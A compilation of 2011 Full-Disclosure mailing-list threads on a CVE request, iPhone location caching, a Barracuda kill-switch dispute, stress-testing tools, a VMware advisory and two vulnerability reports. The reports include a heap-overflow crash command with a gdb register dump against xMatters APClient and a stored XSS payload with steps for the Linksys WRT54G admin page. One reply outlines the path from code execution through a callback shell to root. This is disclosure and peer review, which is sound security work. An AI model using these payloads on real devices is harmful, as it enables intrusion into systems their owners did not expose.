Re: [Full-disclosure] Requesting/Reserving CVE Question

[Marcus Meissner]

On Thu, Apr 28, 2011 at 06:42:13PM +0300, Henri Salo wrote:
> On Thu, Apr 28, 2011 at 09:14:57AM -0600, ctrun...@christophertruncer.com 
> wrote:
> > Hello all,
> > 
> > First off, if this isn't the place to ask this question, I apologize, and
> > feel free to ignore this e-mail.  
> > 
> > I've found a couple vulnerabilities in a web forum/portal/etc. product
> > called IP.Board.  I was looking to reserve a CVE number, and I attempted to
> > contact the address Mitre lists for reserving one, however, it's been
> > nearly a month and I have not received anything back from them.  This is
> > the first vulnerability I have found, and have never requested/reserved a
> > CVE before, so I am a little unfamiliar with the process (although based
> > off of the following website, it looks like all I need to do is send an
> > e-mail to them - http://cve.mitre.org/cve/obtain_id.html).  
> > 
> > I've sent follow up e-mails and I've received no response.  What my
> > question to you all is how long does this process take?  Is there something
> > else that should be done, or someone else the request should be sent to? 
> > What's time normal time frame from requesting a CVE number to hearing back
> > from them?
> > 
> > Thanks for any help/info/advice.  I appreciate it.
> > 
> > Chris
> 
> No luck. With open-source you could have tried:
> http://oss-security.openwall.org/wiki/mailing-lists/oss-security

The oss-security list only handles opensource software, which IP.Board does not 
appear to be.

As for Mitre, just resend the e-mail, they usually answer at some point in time.
(They seem to be overworked, so its not just you.)

A simple e-mail requesting one as explained in obtain_id.html should work.

Ciao, Marcus

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] iPhone Geolocation storage

[Christian Sciberras]

Speak about bullshit. Tomtom has that listed in their EULA, unlike Apple
(who needs an EULA when fanboys follow blindly?)
Besides of which, the police already can be granted (upon request) access to
servers (where your data is already stored in plain text), so I don't see
the big deal.

But hey, if a fridge or a microwave oven is spying on you, it must make big
news. Bigger of course than retards wasting time on Youtube anyway.





On Fri, Apr 29, 2011 at 1:39 AM, Ivan .  wrote:

> and now tom tom as well
>
>
> http://crave.cnet.co.uk/cartech/tomtom-admits-to-sending-your-routes-and-speed-information-to-the-police-50003618/
>
> On Thu, Apr 28, 2011 at 9:35 AM, Ivan .  wrote:
> > stevie says it just a bug, a patented bug
> >
> >
> http://gawker.com/?_escaped_fragment_=5795442/apple-patent-reveals-extensive-stalking-plans#!5795442/apple-patent-reveals-extensive-stalking-plans
> >
> > On Wed, Apr 27, 2011 at 8:46 PM,   wrote:
> >>> M$ are in the love in
> >>>
> >>> http://news.cnet.com/8301-31921_3-20057329-281.html
> >>>
> >>> On Tue, Apr 26, 2011 at 8:12 PM, Ivan .  wrote:
> >>>
>  Interesting write up, and apparently old news
> 
> 
> >>
> >> If you have jailbroken your phone, just use cydia and search for tool
> >> 'Untrackerd' to fix this issue. This background process reset the file
> >> periodically.
> >>
> >> I have always said this, after you have JB'd your iPhone, then it
> becomes
> >> a phone :) I hated that apple's bullshit where your phone is completely
> >> tied to itunes unless you jailbroke.
> >>
> 
> https://alexlevinson.wordpress.com/2011/04/21/3-major-issues-with-the-latest-iphone-tracking-discovery/
> 
>  On Fri, Apr 22, 2011 at 1:59 PM, mark seiden  wrote:
> 
> > yes, that's right.  on one of the forensics lists someone pointed out
> > that
> > he started google maps for 6 seconds
> > and ended up with 1253 locations in the cache, all with the same time
> > stamp.  those would be potential known
> > locations in your neighborhood.
> >
> > much fuller disclosure in
> >
> > http://markey.house.gov/docs/applemarkeybarton7-12-10.pdf
> >
> > including that the some of the location data comes from google.
> >
> > it looks like everything gets anonymized, aggregated to 5 digit
> > zipcodes,
> > and max retention of 6 months, but don't
> > talk much about what the device does except when it uploads data.
> >
> > the congressional disclosure, while it makes me feel better about
> > location
> > data, contains a few choice items like
> >
> >
> >
> > it's unclear how apple can keep app developers from retaining
> location
> > data.  which doesn't seem forbidden by apple, only by law.
> >
> > it's also unclear why they keep really old data in the cache on the
> > phone.
> >  cache bloat results for little benefit.
> >
> > the android doesn't do time-based pruning either and has a similar
> > location cache with the same data it.
> >
> > it appears to me that since the keying is by mac address or the tower
> > id
> > that there will only be one timestamped item for
> > each of those.  so if you go around the same neighborhood repeatedly,
> > the
> > same data will be in the cache.   so not exactly
> > tracking, just recency.
> >
> > but it would seem prudent to both specify and implement the briefest
> > retention of the location data that was possible to perform
> > the function expected by the user.
> >
> >
> > On Apr 20, 2011, at 12:34 PM, Brandon Matthews wrote:
> >
> > >
> > > I've been poring over my phone's data, and I'm not sure if the
> > resolution is
> > > just very low, or if it's logging the locations of towers and not
> my
> > phone.
> > >
> > > Ex: http://imgur.com/2m5tO
> > >
> > > I'm going to xref with FCC databases soon to try and find out.
> > >
> > > B
> > >
> > > (Not speaking for Cisco, only for myself and with nobody's
> approval)
> > >
> > > On 4/20/11 12:11 PM, "Michele Orru"  did
> > declare:
> > >
> > >> Already twitted today.
> > >> Pretty scary btw. I hope there's not the equivalent for Android.
> > >>
> > >> antisnatchor
> > >>
> > >>>
> >
> 
> > >>>
> > >>> Thor (Hammer of God) 
> > >>> April 20, 2011 9:05 PM
> > >>>
> > >>>
> > >>> For those of you who have not seen this yet:
> > >>>
> > >>> http://radar.oreilly.com/2011/04/apple-location-tracking.html
> > >>>
> > >>> Description: Description: Description:
> > cid:image001.png@01CBA43F.5B83F2A0
> > >>>
> > >>> /There's no reason to think "outside the box" /
> > >>>
> > >>> /if you don't think yourself into it. /
> > >>>
> > >>> **

Re: [Full-disclosure] Insect Pro - Advisory 2011 0428 - Zero Day - Heap Buffer Overflow in xMatters APClient

[Mario Vilas]

Precisely. The poc triggers the bug by passing a very long command line
argument, so it's assumed the attacker already has executed code. The only
way this is exploitable is if the binary has suid (then the attacker can
elevate privileges) or the command can be executed remotely (and the
attacker additionaly cannot execute any other commands, but can mysteriously
control the arguments). Unless either scenario is researched (and nothing in
the advisory tells me so) I call bullshit.

On Thu, Apr 28, 2011 at 6:09 PM,  wrote:

> On Thu, 28 Apr 2011 14:40:22 -0300, Mario Vilas said:
>
> > Is the suid bit set on that binary? Otherwise, unless I'm missing
> something
> > it doesn't seem to be exploitable by an attacker...
>
> Who cares?  You got code executed on the remote box, that's the *hard*
> part.
> Use that to inject a callback shell or something, use *that* to get
> yourself a shell
> prompt.  At that point, download something else that exploits you to root -
> if
> you even *need* to, as quite often the Good Stuff is readable by non-root
> users.
>



-- 
“There's a reason we separate military and the police: one fights the enemy
of the state, the other serves and protects the people. When the military
becomes both, then the enemies of the state tend to become the people.”
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Barracuda backdoor

[Valdis . Kletnieks]

On Thu, 28 Apr 2011 19:18:59 +0300, Tõnu Samuel said:

> From: Chelsi Newland [mailto:cnewl...@barracuda.com] 
> Sent: Wednesday, April 27, 2011 5:51 PM
> Subject: FW: Current (Expires 2011-11-21)
> Importance: High
>
>
> Please note we have proof of payment to you from the end user.  Either
> reimburse this customer, or send payment for this order.
>
> Please advise payment on your account so we can enable their unit.
>
> Sincerely,
>
> Chelsi Newland| Barracuda Networks | Credit/Collections Manager

You *do* realize that isn't proof of anything other than "show us the money or
we turn off the subscription features" - which is a known common and well
documented practice (see the NANOG thread I referenced).  I don't see anything
here that says they went out of their way to *totally* break the unit.



pgps16gfjsDQU.pgp
Description: PGP signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Stress Testing Tools

[Gaurang Pandya]

I have generated around 4G of attack using Hping from 6 servers, and I could 
have still increased it but that was all I needed. So I think hping does good 
job..

Gaurang.





From: Oscar 
To: Sec Tools 
Cc: full-disclosure@lists.grok.org.uk
Sent: Wed, April 27, 2011 5:44:14 PM
Subject: Re: [Full-disclosure] Stress Testing Tools

Hi,

I am also in the verg of testing firewall/IDS/IPS currently i am looking at 
some 
DOS/DDOS/stress testing tools.. Please help me on that..

Thanks in Advance
Oscar


On Wed, Apr 27, 2011 at 11:17 AM, Sec Tools  wrote:

I've been using a combination of Mausezahn ( 
http://www.perihel.at/sec/mz/index.html ), Tcpreplay ( 
http://tcpreplay.synfin.net ) and some times Scapy ( 
http://www.secdev.org/projects/scapy/ )  for our 1G/10G network stress testing 
needs ( mostly for probing and checking the resilience of new network 
appliances 
). 

>
>I noted that these tools were not updated recently (for one year aprox). Do 
>you 
>guys have any suggestions on better approaches / really good new tools to do 
>this? ( note that currently our budget does not allow the use of hardware 
>based 
>solutions ).
>
>Best Regards,
>
>John James
>http://sectools.org/ 
>___
>Care2 makes it easy for everyone to live a healthy, green lifestyle and impact 
>the causes you care about most. Over 12 Million members! http://www.care2.com 
>Feed a child by searching the web! Learn how http://www.care2.com/toolbar
>___
>Full-Disclosure - We believe in it.
>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Barracuda backdoor

[bk]

> On Fri, Apr 29, 2011 at 3:17 AM, bk  wrote:
> On Apr 28, 2011, at 3:09 AM, Tõnu Samuel wrote:
> 
> > One day their Barracuda product stopped working.
> >
> > After investigating problem it came out that Barracuda reseller and
> > Barracuda itself have some misunderstandings and because of this
> > Barracuda not only disabled all kind of subscription services
> 
> You're unsubstantiated claims don't bare repeating.  I will however point out 
> that many vendors disable some portion of functionality when subscription or 
> support payments lapse.  This is widely done in the industry and a surprise 
> to no one.
> 
> --
> chort
> ___

On Apr 28, 2011, at 7:20 PM, Cal Leeming wrote:

> Name ten.

For starters, every anti-spam company ever.  I should know, I've worked for 
half of them.  At the very least you cannot get upgrades or patches of any 
kind.  Most of them disable anti-spam updates, all of them disable anti-virus 
updates, and some even disable anti-spam scanning entirely.  The anti-spam SaaS 
vendors I know of will disable accepting your mail after a grace period if you 
haven't moved your MX records.

Hmm, let's see.  Firewall vendors won't let you apply updates, some of them 
cripple VPN functionality when your license has expired... really, do we need 
to go on?  There's a long precedent for products going into a degraded mode if 
your subscription or license expires.

--
chort


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Barracuda backdoor

[bk]

On Apr 28, 2011, at 3:09 AM, Tõnu Samuel wrote:

> One day their Barracuda product stopped working.
> 
> After investigating problem it came out that Barracuda reseller and 
> Barracuda itself have some misunderstandings and because of this 
> Barracuda not only disabled all kind of subscription services 

You're unsubstantiated claims don't bare repeating.  I will however point out 
that many vendors disable some portion of functionality when subscription or 
support payments lapse.  This is widely done in the industry and a surprise to 
no one.

--
chort
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] iPhone Geolocation storage

[Ivan .]

and now tom tom as well

http://crave.cnet.co.uk/cartech/tomtom-admits-to-sending-your-routes-and-speed-information-to-the-police-50003618/

On Thu, Apr 28, 2011 at 9:35 AM, Ivan .  wrote:
> stevie says it just a bug, a patented bug
>
> http://gawker.com/?_escaped_fragment_=5795442/apple-patent-reveals-extensive-stalking-plans#!5795442/apple-patent-reveals-extensive-stalking-plans
>
> On Wed, Apr 27, 2011 at 8:46 PM,   wrote:
>>> M$ are in the love in
>>>
>>> http://news.cnet.com/8301-31921_3-20057329-281.html
>>>
>>> On Tue, Apr 26, 2011 at 8:12 PM, Ivan .  wrote:
>>>
 Interesting write up, and apparently old news


>>
>> If you have jailbroken your phone, just use cydia and search for tool
>> 'Untrackerd' to fix this issue. This background process reset the file
>> periodically.
>>
>> I have always said this, after you have JB'd your iPhone, then it becomes
>> a phone :) I hated that apple's bullshit where your phone is completely
>> tied to itunes unless you jailbroke.
>>
 https://alexlevinson.wordpress.com/2011/04/21/3-major-issues-with-the-latest-iphone-tracking-discovery/

 On Fri, Apr 22, 2011 at 1:59 PM, mark seiden  wrote:

> yes, that's right.  on one of the forensics lists someone pointed out
> that
> he started google maps for 6 seconds
> and ended up with 1253 locations in the cache, all with the same time
> stamp.  those would be potential known
> locations in your neighborhood.
>
> much fuller disclosure in
>
> http://markey.house.gov/docs/applemarkeybarton7-12-10.pdf
>
> including that the some of the location data comes from google.
>
> it looks like everything gets anonymized, aggregated to 5 digit
> zipcodes,
> and max retention of 6 months, but don't
> talk much about what the device does except when it uploads data.
>
> the congressional disclosure, while it makes me feel better about
> location
> data, contains a few choice items like
>
>
>
> it's unclear how apple can keep app developers from retaining location
> data.  which doesn't seem forbidden by apple, only by law.
>
> it's also unclear why they keep really old data in the cache on the
> phone.
>  cache bloat results for little benefit.
>
> the android doesn't do time-based pruning either and has a similar
> location cache with the same data it.
>
> it appears to me that since the keying is by mac address or the tower
> id
> that there will only be one timestamped item for
> each of those.  so if you go around the same neighborhood repeatedly,
> the
> same data will be in the cache.   so not exactly
> tracking, just recency.
>
> but it would seem prudent to both specify and implement the briefest
> retention of the location data that was possible to perform
> the function expected by the user.
>
>
> On Apr 20, 2011, at 12:34 PM, Brandon Matthews wrote:
>
> >
> > I've been poring over my phone's data, and I'm not sure if the
> resolution is
> > just very low, or if it's logging the locations of towers and not my
> phone.
> >
> > Ex: http://imgur.com/2m5tO
> >
> > I'm going to xref with FCC databases soon to try and find out.
> >
> > B
> >
> > (Not speaking for Cisco, only for myself and with nobody's approval)
> >
> > On 4/20/11 12:11 PM, "Michele Orru"  did
> declare:
> >
> >> Already twitted today.
> >> Pretty scary btw. I hope there's not the equivalent for Android.
> >>
> >> antisnatchor
> >>
> >>>
> 
> >>>
> >>> Thor (Hammer of God) 
> >>> April 20, 2011 9:05 PM
> >>>
> >>>
> >>> For those of you who have not seen this yet:
> >>>
> >>> http://radar.oreilly.com/2011/04/apple-location-tracking.html
> >>>
> >>> Description: Description: Description:
> cid:image001.png@01CBA43F.5B83F2A0
> >>>
> >>> /There's no reason to think "outside the box" /
> >>>
> >>> /if you don't think yourself into it. /
> >>>
> >>> **
> >>>
> >>> *My newest book: "Thor's Microsoft Security Bible
> >>> <
> http://www.amazon.com/Thors-Microsoft-Security-Bible-Infrastructures/dp/1597
> >>> 495727C:/Users/thor/Documents/Cakewalk>"
> >>> *
> >>>
> >>> **
> >>>
> >>> *Timothy Thor Mullen
> >>> t...@hammerofgod.com *
> >>>
> >>> *http://www.hammerofgod.com *
> >>>
> >>> ___
> >>> Full-Disclosure - We believe in it.
> >>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> >>> Hosted and sponsored by Secunia - http://secunia.com/
> >> ___
>>

Re: [Full-disclosure] Insect Pro - Advisory 2011 0428 - Zero Day - Heap Buffer Overflow in xMatters APClient

[ichib0d crane]

Any reason for the hostility? The nigerian thing was ages ago and out
of curiosity, and I don't see how my choice of school is relevant in
the situation. Wheres this six month deal coming from and when did I
ever say I even counted myself as a hacker?

All I'm saying is InsectPro did poor documentation and poor
investigation into the "vulnerability".

On Thu, Apr 28, 2011 at 3:11 PM, ghost  wrote:
> So in 6 short months you've become a master hacker huh Gage ? All that
> reporting "nigerian scammers" really put you to the top of the hacker
> echelon ?  or is it cause you finally got a piece of paper as
> "recognition" from your little school ?
>
> In short; Shut the fuck up and go play in traffic, kid.
>
>
> On Thu, Apr 28, 2011 at 2:39 PM, ichib0d crane  
> wrote:
>> This isn't a zero day. This is a vulnerability. Being able to crash
>> the system is nothing compared to the effort needed to actually write
>> the exploit. What function is the heap overflow in? Did you guys even
>> bother to find out? How do I know this is even a heap overflow? Heck
>> you couldnt even overwrite a single register! How effective are
>> standard mitigations on the target? Are there even any?(if there isnt
>> and you couldnt overwrite a single reg theres something wrong with
>> you).
>>
>> Cool fuzz story bro, tell it again, but a quick fuzz doesn't drop zero
>> days. A smart exploit WRITER drops zero days.
>>
>> Come back once you stop being an amateur.
>>
>> ___
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>>
>

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Insect Pro - Advisory 2011 0428 - Zero Day - Heap Buffer Overflow in xMatters APClient

[ghost]

So in 6 short months you've become a master hacker huh Gage ? All that
reporting "nigerian scammers" really put you to the top of the hacker
echelon ?  or is it cause you finally got a piece of paper as
"recognition" from your little school ?

In short; Shut the fuck up and go play in traffic, kid.


On Thu, Apr 28, 2011 at 2:39 PM, ichib0d crane  wrote:
> This isn't a zero day. This is a vulnerability. Being able to crash
> the system is nothing compared to the effort needed to actually write
> the exploit. What function is the heap overflow in? Did you guys even
> bother to find out? How do I know this is even a heap overflow? Heck
> you couldnt even overwrite a single register! How effective are
> standard mitigations on the target? Are there even any?(if there isnt
> and you couldnt overwrite a single reg theres something wrong with
> you).
>
> Cool fuzz story bro, tell it again, but a quick fuzz doesn't drop zero
> days. A smart exploit WRITER drops zero days.
>
> Come back once you stop being an amateur.
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Insect Pro - Advisory 2011 0428 - Zero Day - Heap Buffer Overflow in xMatters APClient

[ichib0d crane]

This isn't a zero day. This is a vulnerability. Being able to crash
the system is nothing compared to the effort needed to actually write
the exploit. What function is the heap overflow in? Did you guys even
bother to find out? How do I know this is even a heap overflow? Heck
you couldnt even overwrite a single register! How effective are
standard mitigations on the target? Are there even any?(if there isnt
and you couldnt overwrite a single reg theres something wrong with
you).

Cool fuzz story bro, tell it again, but a quick fuzz doesn't drop zero
days. A smart exploit WRITER drops zero days.

Come back once you stop being an amateur.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Insect Pro - Advisory 2011 0428 - Zero Day - Heap Buffer Overflow in xMatters APClient

[Valdis . Kletnieks]

On Thu, 28 Apr 2011 14:40:22 -0300, Mario Vilas said:

> Is the suid bit set on that binary? Otherwise, unless I'm missing something
> it doesn't seem to be exploitable by an attacker...

Who cares?  You got code executed on the remote box, that's the *hard* part.
Use that to inject a callback shell or something, use *that* to get yourself a 
shell
prompt.  At that point, download something else that exploits you to root - if
you even *need* to, as quite often the Good Stuff is readable by non-root
users.


pgpa4tTkUuJIF.pgp
Description: PGP signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Insect Pro - Advisory 2011 0428 - Zero Day - Heap Buffer Overflow in xMatters APClient

[Mario Vilas]

Is the suid bit set on that binary? Otherwise, unless I'm missing something
it doesn't seem to be exploitable by an attacker...

On Thu, Apr 28, 2011 at 12:03 PM, Juan Sacco
wrote:

>  Information
>  
>  Name : Heap Buffer Overflow in xMatters AlarmPoint APClient
>  Version: APClient 3.2.0 (native)
>  Software : xMatters AlarmPoint
>  Vendor Homepage : http://www.xmatters.com
>  Vulnerability Type : Heap Buffer Overflow
>  Md5: 283d98063323f35deb7afbd1db93d859  APClient.bin
>  Severity : High
>  Researcher : Juan Sacco 
>
>  Description
>  --
>  The AlarmPoint Java Server consists of a collection of software
>  components and software APIs designed to provide a flexible and
>  powerful set of tools for integrating various applications to
>  AlarmPoint.
>
>  Details
>  ---
>  AlarmPoint APClient is affected by a Heap Overflow vulnerability in
>  version APClient 3.2.0 (native)
>
>  A heap overflow condition is a buffer overflow, where the buffer that
>  can be overwritten is allocated in the heap portion of memory, generally
>  meaning that the buffer was allocated using a routine such as the POSIX
>  malloc() call.
>  https://www.owasp.org/index.php/Heap_overflow
>
>
>  Exploit as follow:
>  Submit a malicious file cointaining the exploit
>  root@ea-gateway:/opt/alarmpointsystems/integrationagent/bin$
>  ./APClient.bin --submit-file maliciousfile.hex
>  or
>  (gdb) run `python -c 'print "\x90"*16287'`
>  Starting program:
>  /opt/alarmpointsystems/integrationagent/bin/APClient.bin `python -c
>  'print "\x90"*16287'`
>
>  Program received signal SIGSEGV, Segmentation fault.
>  0x0804be8a in free ()
>  (gdb) i r
>  eax0xa303924170932516
>  ecx0xbfb8   49080
>  edx0xa303924170932516
>  ebx0x8059438134583352
>  esp0xbfff3620   0xbfff3620
>  ebp0xbfff3638   0xbfff3638
>  esi0x8059440134583360
>  edi0x80653f0134632432
>  eip0x804be8a0x804be8a 
>  eflags 0x210206 [ PF IF RF ID ]
>  cs 0x73 115
>  ss 0x7b 123
>  ds 0x7b 123
>  es 0x7b 123
>  fs 0x0  0
>  gs 0x33 51
>  (gdb)
>
>
>  Solution
>  ---
>  No patch are available at this time.
>
>  Credits
>  ---
>  Manual discovered by Insecurity Research Labs
>  Juan Sacco - http://www.insecurityresearch.com
>
> --
>  --
>  _
>  Insecurity Research - Security auditing and testing software
>  Web: http://www.insecurityresearch.com
>  Insect Pro 2.5 was released stay tunned
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



-- 
“There's a reason we separate military and the police: one fights the enemy
of the state, the other serves and protects the people. When the military
becomes both, then the enemies of the state tend to become the people.”
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Barracuda backdoor

[Marsh Ray]

On 04/28/2011 05:51 AM, Tõnu Samuel wrote:
> On Thu, 2011-04-28 at 11:45 +0100, Benji wrote:
>> Do you actually have any evidence of a backdoor? Or could this just be
>> a remote 'turn-off' switch as such? I'm not saying that one is better
>> than the other, but they are very different features.
>
> I have no idea how this technically is implemented or what they can do
> else. This is clear example of closed source product dangers. Today we
> found some "switch off", tomorrow what?

Tomorrow Barracuda gets pwned and this turns into a cascade failure.

Oh wait, that happened two weeks ago:
   http://www.theregister.co.uk/2011/04/11/barracuda_networks_attack/

> How we can be sure about
> anything? Only thing I am sure now: they kept copy of keys to house you
> bought from them years ago and their used those keys for illegal thing.

Let's be careful though: just because your system stopped working 
doesn't mean it has a backdoor. It could have been implemented as simply 
a periodic "phone home for updates" which received some type of 
"license expired" message. A remote kill switch, for sure, but not 
necessarily the same as a back door.

It raises the question though of how many companies have that particular 
combination of ethics and self-discipline to implement one and not the 
other. It sometimes takes extra work to build a product that performs 
security functions in a customer's network without granting yourself 
unnecessary privilege on that network.

As we saw with RSA SecurID, many admins didn't realize that the vendor 
might be keeping a copy of the keys. Sites with products on their 
networks may want to consider if Barracuda as an external vendor falls 
under the scope of their PCI requirements.

- Marsh

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Cisco Linksys WRT54G XSS Vulnerability

[Justin Klein Keane]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Description of Vulnerability:
- -
Linksys WRT54G is a consumer wireless G broadband router and four port
switch (http://www.linksysbycisco.com/ANZ/en/support/WRT54G).  The
device provides an administration interface for configuration via a web
browser.  Unfortunately the interface does not sanitize keywords for
safe browsing leading to a stored/persistent cross site scripting (XSS)
vulnerability.

Systems affected:
- -
Cisco Linksys Wireless G Boradband Router WRT54G with firmware version
4.21.1 was tested and found to be vulnerable.

Proof of Concept:
- -
1.  Log into the WRT54G administration screen and navigate to /Filters.asp
2.  Enter "' onBlur='alert("xss")" for the "Website Blocking by Keyword"
value.
3.  Click the 'Save Settings' button at the bottom of the form, ignore
the error and click 'Continue'
4.  After the page refreshes click on the "Website Blocking by Keyword"
textfield then click outside to view the JavaScript alert

- -- 
Justin Klein Keane
http://www.MadIrish.net

The digital signature on this e-mail may be confirmed using the
PGP key located at: http://www.madirish.net/gpgkey
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.11 (GNU/Linux)
Comment: Using GnuPG with Fedora - http://enigmail.mozdev.org/

iPwEAQECAAYFAk25n/kACgkQkSlsbLsN1gBrhgb/XGXxT9qHwKE6mb9yGuWZDjZA
LXM+tK9/0JNoU+yNiXopztFKpB1dsYt5Rbo6zYSOirJmL4C4/DRqmtj8eHNLCPuw
bJ5GsF9oICZ3CdMj5k6IA3d0THM32WA1G+rxKPAGFPpHNr3rVBRZuvki1jENJLXo
2VN45dRu8+z/Zcp7RMMN/hcTqdAzL95dUIR/XmShSOGoRv9coG+JscCBCfU+jy2K
ZcaXussmPWihBe1y+pJknm/tf70yxhoR1HD1i/Cv4Sss+BC+LRtl1ofht84hwFVy
yPY43N+81fdZjYxg54Q=
=sDiu
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] VMSA-2011-0007 VMware ESXi and ESX Denial of Service and third party updates for Likewise components and ESX Service Console

[VMware Security Team]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- 
   VMware Security Advisory

Advisory ID:   VMSA-2011-0007
Synopsis:  VMware ESXi and ESX Denial of Service and third party
   updates for Likewise components and ESX Service
   Console
Issue date:2011-04-28
Updated on:2011-04-28
CVE numbers:   CVE-2011-1785 CVE-2011-1786 CVE-2010-1324
   CVE-2010-1323 CVE-2010-4020 CVE-2010-4021
   CVE-2010-2240
- 

1. Summary

   VMware ESXi and ESX could encounter a socket exhaustion situation
   which may lead to a denial of service. Updates to Likewise components
   and to the ESX Service Console address security vulnerabilities.

2. Relevant releases

   VMware ESXi 4.1 without patch ESXi410-201104401-SG.
   VMware ESXi 4.0 without patch ESXi400-201104401-SG.

   VMware ESX 4.1 without patch ESX410-201104401-SG.
   VMware ESX 4.0 without patch ESX400-201104401-SG.

3. Problem Description

  a. ESX/ESXi Socket Exhaustion
 
   By sending malicious network traffic to an ESXi or ESX host an
   attacker could exhaust the available sockets which would prevent
   further connections to the host. In the event a host becomes
   inaccessible its virtual machines will continue to run and have
   network connectivity but a reboot of the ESXi or ESX host may be
   required in order to be able to connect to the host again.

   ESXi and ESX hosts may intermittently lose connectivity caused by
   applications that do not correctly close sockets. If this occurs an
   error message similar to the following may be written to the vpxa
   log:
   
   socket() returns -1 (Cannot allocate memory)

An error message similar to the following may be written to the
vmkernel logs:

   socreate(type=2, proto=17) failed with error 55

VMware would like to thank Jimmy Scott at inet-solutions.be for
reporting this issue to us.

The Common Vulnerabilities and Exposures Project (cve.mitre.org) has
assigned the name CVE-2011-1785 to this issue.

Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.

VMware Product   Running  Replace with/
ProductVersion   on   Apply Patch
=    ===  =
vCenterany   Windows  not affected

hosted *   any   any  not affected

ESXi   4.1   ESXi ESXi410-201104401-SG
ESXi   4.0   ESXi ESXi400-201104401-SG
ESXi   3.5   ESXi not affected

ESX4.1   ESX  ESX410-201104401-SG
ESX4.0   ESX  ESX400-201104401-SG
ESX3.5   ESX  not affected
ESX3.0.3 ESX  not affected

  * hosted products are VMware Workstation, Player, ACE, Fusion.

  b. Likewise package update
 
Updates to the vmware-esx-likewise-openldap and
vmware-esx-likewise-krb5 packages address several security issues.

One of the vulnerabilities is specific to Likewise while the other
vulnerabilities are present in the MIT version of krb5.
An incorrect assert() call in Likewise may lead to a termination
of the Likewise-open lsassd service if a username with an illegal
byte sequence is entered for user authentication when logging in to
the Active Directory domain of the ESXi/ESX host. This would lead to
a denial of service.
The MIT-krb5 vulnerabilities are detailed in MITKRB5-SA-2010-007.

The Common Vulnerabilities and Exposures project (cve.mitre.org) has
assigned the names CVE-2011-1786 (Likewise-only issue),
CVE-2010-1324, CVE-2010-1323, CVE-2010-4020, CVE-2010-4021 to these
issues.

Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.

VMware Product   Running  Replace with/
ProductVersion   on   Apply Patch
=    ===  =
vCenterany   Windows  not affected

hosted *   any   any  not affected

ESXi   4.1   ESXi ESXi410-201104401-SG
ESXi   4.0   ESXi not affected
ESXi   3.5   ESXi not affected

ESX4.1   ESX  ESX410-201104401-SG
ESX4.0   ESX  not affected
ESX3.5   ESX  not affected
ESX3.0.3 ESX  not affected

  c. ESX third party update for Service Console kernel
   
The Service Console kernel is updated to include a fix for a
security issue.

The Common Vulnerabilities and Exposures project (cve.mitre.org) has
assigned the name CVE-

Re: [Full-disclosure] Barracuda backdoor

[Valdis . Kletnieks]

On Thu, 28 Apr 2011 13:09:14 +0300, =?ISO-8859-1?Q?T=F5nu_Samuel?= said:

> One day their Barracuda product stopped working.

OK... That's hardly surprising, given the high-quality software engineering
that Barracuda is known for.. ;)

> Barracuda not only disabled all kind of subscription services but also
> used some kind of backdoor in their products to disable product customer
> had paid long time ago.

And I should believe this claim, why?

> Message was shown "Error: Activation has not been completed. Please
> activate your Barracuda Spam & Virus Firewall to enable functionality.
> (Click here to activate)". Customer was blocked to make any changes in
> admin interface of product. Even more irritating was fact that admin
> wanted to see why some e-mails were lost and was denied even to see logs!

Strong claims require strong evidence.  It's well-known that Barracuda turns
off subscription services if you don't pay - and even charges you back coverage
for years you skipped.  See the thread starting here:

http://mailman.nanog.org/pipermail/nanog/2011-April/035067.html

Now the question is - given that *that* Barracuda was at least semi-functional
even when off support, do we have any indication that your unit was in fact
intentionally disabled?  It could very well be the symptoms you are seeing are
the unit being just plain *broken*.


pgpzlWs0qMFdp.pgp
Description: PGP signature
___
